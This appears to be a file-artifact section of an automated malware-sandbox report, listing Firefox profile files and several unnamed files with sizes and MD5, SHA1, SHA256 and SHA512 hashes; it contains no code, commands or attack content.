MD57c1d3c32d07535f55844329f0cec5ca6
SHA1e4a8b2ebd02f24eba052e735f8abd44e1236558b
SHA256921229765a68ac121368022bec914c79a7e02996a213958081221db052feb78c
SHA5125c9a7b8b291d9bab726f3646c7738852133182e878aa7a76469b1397a978601f3a386e2657ef2f95a81feeadff4169bee73bf12b4f5f94126703a777fa1769fe
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\bookmarkbackups\bookmarks-2025-02-21_11_jW3bA-haq5FY5CTB-RWVXA==.jsonlz4
Filesize1007B
MD5a544391476c6eed74b6a938062f9e1cb
SHA1858c15267453e6e1bcee554597134237e3f27bd6
SHA25665fa9c8f6322baea817e2a57925ab44712828ef3f4b75ba30d9fad21652a5e35
SHA5121e2266f15a0f1593f60e642cf557e76765a4680c3b9886128c5f11620cf9c2f5d3e89910ecd26f5242af70f6df8c01a9313a0f1bddf0dd79b8585e86b45c19a9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD52c1847581a138690c7c65438308ee961
SHA1a523aaafcf73a4bae7e8297549a80abf7ad09b60
SHA256db48149ba24e49e2fc9f02cf71d9bcf2ec45e133e0fde4d3509c4efd1e9ceb16
SHA512e76a48a3ad3651f7ee790ca85b6c1c9b8b70123d17354498868c724535b9a1af63d8df0fce41ac0fc9be5f53908c47642aeb7ff911836852a6049f6803a4c7ad
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5a7718806d38778eba95261677c40c711
SHA1d4180dbe8c9fc8d012b9eebcdfce51c1bd376ced
SHA256f3ead55422a00751ce269ccb584fa55dc23a73cef0afb25b122eb55164a6c1b0
SHA512ec83b24be348c2c04a8fb4553ef1bde553d70c6db92eea722656e9502f3e84ff71c34379dcb1fb11430f2a39fce727b472000672d7e343cf597d70f878244172
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\datareporting\glean\db\data.safe.tmp
Filesize16KB
MD51dd315151dc3c96886ed984a0845f3e4
SHA19fd85926322f57e681624370d4a9cbd1206daa53
SHA256e5cf0b9d4b3806fec49cc65bb02ee01ba6359f9389a76e357c8f257fe813f774
SHA51290f99b8eebc69db638adc225072dfbde38f199b7f441e40b6dcabaa251c1abc4673f1d390915006b60d468914d10d06c4c6b051e0ad4c79f098250d6bcc98101
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\datareporting\glean\db\data.safe.tmp
Filesize16KB
MD5748df8c6c6e43fdd92f046df7398edaa
SHA163b4275b0b7680b68539a6a50f9bf8a2f0c26ee2
SHA2566f7cdcd12565418a5d5744bd3c14e6470fd0802c41698dc35e760bcca30fca61
SHA512024a7911c6607a87630053515489ee97f67e2a27db99a7c7cef7195cf62d7a5b491f1fee74daa6b56bc462f349883d336e9b65f7716752b070ac745ec84b4d26
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5156fc3e22eec9e1d4ee8e01bd2827cba
SHA1a94e95619e343386597a3b45b9f516717ebb6970
SHA256a01d7b5ffe86c59de82ff4b12979c8b8c2cdc99a697175957378c37e51d0d3e9
SHA5125f050512e854a323a6a4f2474dccb3b1b0f3a9d97c34908c3d6ac160d81637ebc26fa1ad90a2d4a65ab1c52f64daeb9a5f7f03ffee30b9b23b130460ea671d7d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\datareporting\glean\pending_pings\0222d52e-93ff-4e9d-a1b3-fe29b1a14310
Filesize671B
MD5aec4152e57d43e45d63b062ef98cfdae
SHA1186b6db2378f43957b153bbf9e07993fb745b823
SHA256a2f387c7d9abce8c29ea25121bdc3836d9f72dfbeb97123662f8ba36d2e26335
SHA512217ff733bd7cf94e225785485474ab5ee13fc9866e07a8621a0a08343272e19bb69863fe288bf37e20b97fc7c1d84e8f00028cae4b29f1d11f2a185aa1588255
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\datareporting\glean\pending_pings\91574b32-d3df-4c65-8707-ac998261678a
Filesize27KB
MD5ddf1b0fc886abf24f650686b7cbce783
SHA12b36c05c0a48e1b751dc332ea0cb44c33f7d80e8
SHA256213afb1db353d285ed80c2a06ff32dad1f903cfc3b2270ea0e3da3a7fe9d673d
SHA512fc876a66ea154af65b7e6d20a879d85e00d63c9aa03489eba3d001a61fff1e1674a149de5312d9a475087b56a7792e1a0aa6decce2927cbf2cb57c3a68ed1f62
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\datareporting\glean\pending_pings\916959bf-17df-44d6-bf15-8bc4cfd3250d
Filesize982B
MD52dfc1412d4833e9f651d7435fc1c24ca
SHA10e1af76c7e43b2d3353f81ef475f2b6765b6029b
SHA256216300fb01434888526f483bef7b81fd9ec13cedf901977d953d3e1b55d579f3
SHA512014032202e678cc81926ed5e391f6294d0ccfb56c9d352ea84521ca9ae98bd34bfc1df6a31ca218e9a47e8b14fbf36fb23c8b8137b3cd4ec9842345b95c4e08b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
12KB
MD5664ab2c5bbedc718a89ef9057693d2c2
SHA1414879a09b74eda9f108b2ea6b0c34e2b3f30d92
SHA256057a3c790107080ed101326686d14cd1e2b93c019229f20ae513b13560322794
SHA5123ab85bf0f3502a908e04a483dad34f92a3c7e34f724f3925db0e5edaa48b636215b60507d76c59e0d880d721d7fc924ab271a4832476cc9611b956521c04eb19
-
Filesize
10KB
MD5adfff430e4095fedc5bcf4cba7550f99
SHA164ef4a8b637aae9319565c4721aa6a74885389e5
SHA2561e8bedf0667d8d4376cf3cbea32affcb3f1951cdbbb2f46919ec54ff48f0b470
SHA512588f7337c5a75b10d0fa33c3165e6c0a75abddca726ce8a06b524c57c9da66d15b1a60a6fa0c6998d8efad2db3a9bc403d87bb8aa302410e8d6118b88fa3fcee
-
Filesize
10KB
MD5d7e8d00b76df9019667b579f2337046d
SHA136da80528b92d312bb441c2100ffaa879f2809f1
SHA2560cb0337baa1bba847d10b7c33e3d67a08fb7db59ce95660dfe8028c2f172c7d3
SHA5126b571e3cbce47f28851cf53aaf10fd5539c6fbf27155f7ba67b0fa60415653b9f01d877d4ec584f05c69e76e4ed25244e31eedc59374d50dcb7b48af6afecb8b
-
Filesize
9KB
MD57d90f9d0440a3afb0288cf5df38b5451
SHA17bc6bb366b68c21375da77ce3ff6099eb1efc4f5
SHA256eaf358bc393617d075b5fb8c0f4e245ab2a01f68a4993894a98394055a14ac07
SHA51297559790fca7cf8103f41702f46e4f68303d20d10709a300529b9cca4aff58e0499d6c6ceae968c7fb114f364ea77bffa830d36e56e2c672040d25c8f0738669
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD595a520b74089f54f99c9ae4afd6527a9
SHA1803f47d34c68a33a779c1d4d49b7ee2e3a1e53ec
SHA256b385b7a4a30faf4099b8c954eb1e2d5dfe8366f19febb753be4515250d9a06cd
SHA5124ff77b8453264ab244324136fd543327c4f23d16b2e9be6a89635bc103f0f2c3d8f2c2f75b0a2470895642cb28a9ea95bad7efdcaabd3e36a0358afeee4d350c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\sessionstore-backups\recovery.baklz4
Filesize3KB
MD5e4ba6716ec34062983fb6a474464e684
SHA1df9e35e6280e8c886da1a91959b73ad24c0c5ca9
SHA2560aef305ba69fab98968c93be0682d666450eb2a59cde66f399efd21ffdec4bac
SHA51255bbd2dd94432288ec0be26613695c550983c807eb533af9a0191c2d9e3194f210baf7f7ce6a67ec5fee36364a8562cdd234648ce6dc78a0222113036670045b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5k8zi25l.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize632KB
MD54b8eb45642cb031500b852b0f8ffa5a1
SHA1d39c109954deaea8224c8fb2ce8a03f7c690bf37
SHA2565014d399d9ccb20f6e0ff07aa71fa1e50904382ea1f0a7eea5d3b4ebad5eb9f4
SHA512e6c0fa4855d819bf8895779e8000450da4fa1c302819d47d02cb3a8f01bd48e9bef73b6f78178ac654b0605f83f5c13c9a2ad10ef6a5cc992a5201441972b098
-
Filesize
2KB
MD5f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD533c8cad406d5a8aa2a897a5473ab4af5
SHA1cdaabfd4629828a8961bc48aa749ba28cb1edf9d
SHA25624e8332f5db2c2116cc46d0c086b5892a1fa89680046c736a0dd66b980692100
SHA51295e66e57a8a707568ec324a87219753f8f6391a0ca2ed6ed257a28cc5b8c5041c0bb09256c050912247d56f4f6082b829aa09f589de89432d19fe83b126923d5
-
Filesize
652B
MD552dab2414168d3b5bc5adec124dab083
SHA1e5d2be21c931c4875641ceeab8c41458ac628b9b
SHA25630c4959a4cc0a24a656a9a34c04bc6b942c09b35bcd970598b90512c0369ad7c
SHA5120dad7bbabc51360d03b697599d20ef4916b383b4f5771049aea87e3ae5eadeecac5d13704fdd3b21a9c1230a670e941ed55b10cd5d1284fd4d90c9816a54d5ce